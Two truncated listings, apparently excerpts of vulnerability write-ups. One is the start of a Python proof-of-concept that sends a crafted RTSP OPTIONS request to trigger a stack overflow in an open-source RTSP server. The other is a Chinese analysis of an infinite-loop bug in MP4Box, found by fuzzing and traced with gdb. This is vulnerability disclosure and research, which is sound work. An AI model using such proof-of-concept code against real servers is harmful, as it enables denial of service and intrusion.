RTSPServer StackOverflow Vulnerability 0x00 Introduction Project URL：https://github.com/PHZ76/RtspServer 0x01 PoC 1.1 PoC import socket def send_rtsp_options_request(server_ip, server_port, rtsp_path): # make RTSP OPTIONS request d = "4f5054494f4e53202f2e3a2f"…

MP4Box 无限循环漏洞 0x00 前言 漏洞软件地址： https://github.com/gpac/gpac 0x01 漏洞挖掘 AFL++： ./configure --static-bin 0x02 漏洞分析 gdb调试crash文件，触发命令为MP4Box -v -fstat <crashfile>。 堆栈如下： 先看无限循环的地方在av_parsers.c:1639处。 gf_bs_read_int函数的两个参数第一个为bitstream，第二个为读取的Bits数，函数为从bitstea…